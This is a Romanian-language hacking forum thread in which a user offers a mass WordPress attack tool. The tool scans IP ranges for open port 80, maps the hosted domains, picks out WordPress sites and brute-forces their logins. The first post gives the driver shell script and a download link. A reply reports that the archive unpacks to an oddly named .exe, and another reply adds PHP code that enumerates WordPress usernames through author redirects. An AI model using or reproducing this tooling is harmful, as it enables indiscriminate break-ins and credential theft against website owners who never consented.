Jump to content
sebywarlord

Linux WordPress scanner + Bruteforcer

Recommended Posts

Posted (edited)

Acum cateva zile mi-am facut un scanner de wordpress.Ok nu am codat eu nici 1% din el,doar am luat niste scripturi de pe net si le-am unit .

Mersi lui @Elohim pentru script-ul de path disclosure

Scannerul lucreaza in 4 parti

1.Cauta ip-uri cu portul 80 deschis

2.Gaseste toate domeniile hostate pe acele ip-uri

3.Alege url-urile care au wordpress instalat

4.Face bruteforce.

Cum se foloseste ?

./start A [ex ./start 80]

echo "Starting to collect ips"

#This part is for collecting ips on port 80

./ss 80 -i eth0 -s 8 -a $1

#This part is for getting urls from ips

echo "Starting to transform ips to domains"

./getdns bios.txt

#This part is for checking if the domains have wordpress installed

echo "Starting to find domains with wordpress installed"

cat url.txt | sort | uniq > hosts.txt

python findwp.py 500

#This part is for cracking the wp-s

echo " Starting to bruteforce"

./brute -i wpuri.txt -c 250

Download : http://www.mediafire.com/download/jrexbn16132y7bc/wp.zip

Daca aveti intrebari,reply aici!

PS: Daca va place, dati si voi un like, un mersi,nu ca la scannerul ala de RDP care l-am postat (500 downloads si niciun merci. :) )

Edited by sebywarlord
Posted (edited)

[root@localhost Python-2.7.6]# unzip wp.zip

Archive: wp.zip

inflating: 35934-762-sniper-rifle-dragunov-svd-s.exe

---

Houston we have a problem !

Poti urca pe alt host scanu ?

Edited by Htich
Posted (edited)

Unii modifica userul admin.. so..

$url = $host.'/?author=1';

$c = curl_init($url);

curl_setopt($c, CURLOPT_RETURNTRANSFER, true);

curl_setopt($c, CURLOPT_NOBODY,true);

curl_setopt($c, CURLOPT_HEADER, true);

$result = @curl_exec($c);

curl_close($c);

preg_match("/Location: (.*)/",$result,$m);

$sparge = explode("/", $m[1]);

$user = trim($sparge[4]);

if ($user == "") {

$user = "admin";

}

Edited by intrus

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...